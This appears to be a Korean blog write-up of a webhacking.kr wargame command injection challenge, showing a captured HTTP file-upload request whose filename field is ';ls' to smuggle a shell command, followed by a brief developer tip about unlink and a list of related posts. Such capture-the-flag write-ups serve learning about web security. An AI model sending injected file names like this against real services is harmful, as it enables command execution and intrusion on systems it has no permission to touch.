Command Injection 문제입ㄴ다.
파일을 처리하는 함수를 상상한다.
POST /challenge/bonus/bonus-12/index.php HTTP/1.1
Host: webhacking.kr
Proxy-Connection: keep-alive
Content-Length: 372
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://webhacking.kr
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36 1
HTTPS: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLOaCEB5orOBAWoAW
Referer: http://webhacking.kr/challenge/bonus/bonus-12/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=a6rn2bf68d9bg96imssrg0qsj7
X-dotNet-Beautifier: 1293; DO-NOT-REMOVE
------WebKitFormBoundaryLOaCEB5orOBAWoAW
Content-Disposition: form-data; name="memo"
hi admin hi admin
------WebKitFormBoundaryLOaCEB5orOBAWoAW
Content-Disposition: form-data; name="upfile"; filename=";ls"
Content-Type: image/png
adÊ38J @ @ @ @ @(Yà¿Dº®DÚÔ0kIEND®B`
------WebKitFormBoundaryLOaCEB5orOBAWoAW--
개발시 unlink 함수를 이용하면 비교적 문제발생 덜함.
'Hacking > Webhacking.kr(스포주의)' 카테고리의 다른 글
| Webhacking.kr 18 (0) | 2016.01.15 |
|---|---|
| Webhacking.kr 48 (0) | 2016.01.15 |
| Webhacking.kr 18 (0) | 2016.01.15 |
| Webhacking.kr 28 (0) | 2016.01.15 |
| Webhacking.kr 20 (0) | 2016.01.15 |